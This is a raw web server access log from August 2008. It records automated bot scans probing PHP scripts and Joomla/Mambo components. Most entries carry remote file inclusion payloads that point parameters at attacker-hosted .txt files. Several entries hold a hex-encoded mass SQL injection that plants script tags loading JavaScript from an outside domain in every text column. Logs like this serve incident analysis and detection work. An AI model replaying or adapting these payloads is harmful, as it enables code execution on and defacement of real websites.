163.19.117.1 - - [30/Aug/2008:00:34:08 -0400] "GET /logs/error_log.Q108061300///include.php?path[docroot]=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 237 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
163.19.117.1 - - [30/Aug/2008:00:34:13 -0400] "GET /logs/access_log.Q108081300///include.php?path[docroot]=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
193.26.13.170 - - [30/Aug/2008:00:34:31 -0400] "GET /logs/error_log.Q108041100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:34:31 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:34:32 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:34:33 -0400] "GET /logs/error_log.Q108032500//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
85.21.163.40 - - [30/Aug/2008:00:34:36 -0400] "GET /errors.php?error=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
85.21.163.40 - - [30/Aug/2008:00:34:36 -0400] "GET /logs/access_log.Q108072300/errors.php?error=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
85.21.163.40 - - [30/Aug/2008:00:34:36 -0400] "GET /logs/errors.php?error=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
85.21.163.40 - - [30/Aug/2008:00:34:49 -0400] "GET /logs/error_log.Q108072300/errors.php?error=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
200.53.114.42 - - [30/Aug/2008:00:35:38 -0400] "GET /logs/error_log.Q108072300/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:35:41 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:35:46 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:36:04 -0400] "GET /logs/error_log.Q108081400/scanhttp://albcrew.t35.com/pw.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:36:05 -0400] "GET /scanhttp://albcrew.t35.com/pw.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:36:06 -0400] "GET /logs/scanhttp://albcrew.t35.com/pw.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.76"
83.172.148.42 - - [30/Aug/2008:00:36:35 -0400] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.172.148.42 - - [30/Aug/2008:00:36:35 -0400] "GET /logs/access_log.Q108072300/errors.php?error=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.172.148.42 - - [30/Aug/2008:00:36:38 -0400] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.172.148.42 - - [30/Aug/2008:00:36:39 -0400] "GET /logs/error_log.Q108072300/errors.php?error=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
74.6.8.96 - - [30/Aug/2008:00:37:01 -0400] "GET /logs/access_log.Q108030100 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.53.114.42 - - [30/Aug/2008:00:37:17 -0400] "GET /logs/error_log.Q108060200/components/com_colorlab/admin.color.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:37:33 -0400] "GET /logs/access_log.Q108081900//faqsupport/samplefaqsupport.php?path[docroot]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:37:34 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:37:35 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
209.59.12.99 - - [30/Aug/2008:00:37:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.53.114.42 - - [30/Aug/2008:00:38:01 -0400] "GET /logs/access_log.Q108072300/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 291 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:38:37 -0400] "GET /logs/error_log.Q108060200/components/com_colorlab/admin.color.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.76"
12.214.80.238 - - [30/Aug/2008:00:30:00 -0400] "GET /logs/access_log.Q108061600?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 4137708 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; Zango 10.1.181.0)"
193.26.13.170 - - [30/Aug/2008:00:39:18 -0400] "GET /logs/error_log.Q108072300/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:39:18 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:39:28 -0400] "GET /logs/access_log.Q108081300/lostpasswd.php?env[include_prefix]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:39:29 -0400] "GET /lostpasswd.php?env[include_prefix]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:39:29 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:39:46 -0400] "GET /logs/error_log.Q108081300/lostpasswd.php?env[include_prefix]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
74.50.6.170 - - [30/Aug/2008:00:40:03 -0400] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.wintaktrading.com/idzz.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.812"
12.214.80.238 - - [30/Aug/2008:00:39:11 -0400] "GET /logs/access_log.Q108060700?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 491534 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; Zango 10.1.181.0)"
193.26.13.170 - - [30/Aug/2008:00:40:13 -0400] "GET /logs/error_log.Q108060700//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:40:13 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:40:15 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:40:18 -0400] "GET /logs/access_log.Q108072300/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:40:35 -0400] "GET /logs/error_log.Q108081100/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:40:48 -0400] "GET /logs/access_log.Q108062800//admin/classes/TplLoad.php?full_path_to_public_program=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:40:48 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:40:54 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.803"
83.172.148.42 - - [30/Aug/2008:00:41:10 -0400] "GET /logs/error_log.Q108071900/errors.php?error=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
12.214.80.238 - - [30/Aug/2008:00:40:20 -0400] "GET /logs/access_log.Q108060700?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 491534 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; Zango 10.1.181.0)"
200.53.114.42 - - [30/Aug/2008:00:41:43 -0400] "GET /logs/error_log.Q108071100//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:41:44 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:41:45 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
193.26.13.170 - - [30/Aug/2008:00:41:56 -0400] "GET /logs/error_log.Q108081100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:41:56 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:41:59 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
12.214.80.238 - - [30/Aug/2008:00:30:00 -0400] "GET /logs/access_log.Q108061600?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 4137708 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; Zango 10.1.181.0)"
211.96.69.149 - - [30/Aug/2008:00:42:15 -0400] "GET /logs/access_log.Q108082300%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.villaconsuls.com/xbox/id.txt???? HTTP/1.1" 404 267 "-" "libwww-perl/5.65"
209.59.12.99 - - [30/Aug/2008:00:42:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.53.114.42 - - [30/Aug/2008:00:43:01 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.76"
193.26.13.170 - - [30/Aug/2008:00:43:18 -0400] "GET /logs/access_log.Q108081100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
59.125.183.76 - - [30/Aug/2008:00:43:58 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://titureddo.altervista.org/vacanze/pinogino.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
59.125.183.76 - - [30/Aug/2008:00:43:58 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://titureddo.altervista.org/vacanze/pinogino.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
193.26.13.170 - - [30/Aug/2008:00:44:04 -0400] "GET /logs/error_log.Q108081400/scanhttp://albcrew.t35.com/pw.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:44:04 -0400] "GET /scanhttp://albcrew.t35.com/pw.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
84.21.71.133 - - [30/Aug/2008:00:44:05 -0400] "GET /logs/error_log.Q108050400//convert/mvcw.php?step=1&vwar_root=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
84.21.71.133 - - [30/Aug/2008:00:44:05 -0400] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
193.26.13.170 - - [30/Aug/2008:00:44:05 -0400] "GET /logs/scanhttp://albcrew.t35.com/pw.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
84.21.71.133 - - [30/Aug/2008:00:44:05 -0400] "GET //convert/mvcw.php?step=1&vwar_root=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
84.21.71.133 - - [30/Aug/2008:00:44:07 -0400] "GET /logs/error_log.Q108042500//convert/mvcw.php?step=1&vwar_root=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
200.68.35.77 - - [30/Aug/2008:00:44:33 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.donath.de/files/safeon.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
193.26.13.170 - - [30/Aug/2008:00:44:44 -0400] "GET /logs/error_log.Q108071100//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:44:44 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
74.6.8.96 - - [30/Aug/2008:00:44:55 -0400] "GET /logs/access_log.Q107053100 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
84.21.71.133 - - [30/Aug/2008:00:45:46 -0400] "GET /logs/error_log.Q108081200%20//admin/admin.php?vwar_root=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
84.21.71.133 - - [30/Aug/2008:00:46:01 -0400] "GET /logs/error_log.Q108032100%20//admin/admin.php?vwar_root=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
193.26.13.170 - - [30/Aug/2008:00:46:13 -0400] "GET /logs/error_log.Q108071100//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:46:13 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:46:13 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
193.26.13.170 - - [30/Aug/2008:00:47:19 -0400] "GET /logs/access_log.Q108081600//admin/classes/TplLoad.php?full_path_to_public_program=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
209.59.12.99 - - [30/Aug/2008:00:47:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.53.114.42 - - [30/Aug/2008:00:48:06 -0400] "GET /logs/error_log.Q108080700//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:48:18 -0400] "GET /logs/error_log.Q108072300/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:48:24 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:48:25 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.76"
200.49.100.20 - - [30/Aug/2008:00:48:45 -0400] "GET /logs/error_log.Q108081400//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
200.49.100.20 - - [30/Aug/2008:00:48:45 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.69"
200.49.100.20 - - [30/Aug/2008:00:48:46 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.69"
200.53.114.42 - - [30/Aug/2008:00:48:54 -0400] "GET /logs/access_log.Q108081700/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:48:55 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.76"
200.53.114.42 - - [30/Aug/2008:00:48:56 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.76"
195.22.94.70 - - [30/Aug/2008:00:49:19 -0400] "GET //webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://www.asirmt.org//components/com_extcalendar/upload/id.txt??%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.65"
195.22.94.70 - - [30/Aug/2008:00:49:19 -0400] "GET /logs/access_log.Q108071200//webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://www.asirmt.org//components/com_extcalendar/upload/id.txt??%0D?? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
195.22.94.70 - - [30/Aug/2008:00:49:20 -0400] "GET /logs//webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://www.asirmt.org//components/com_extcalendar/upload/id.txt??%0D?? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
85.18.81.164 - - [30/Aug/2008:00:49:25 -0400] "GET /logs/error_log.Q108051900//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.210.98.145 - - [30/Aug/2008:00:49:35 -0400] "GET /logs/access_log.Q108081000//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
67.210.98.145 - - [30/Aug/2008:00:49:35 -0400] "GET /logs/access_log.Q108081000//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
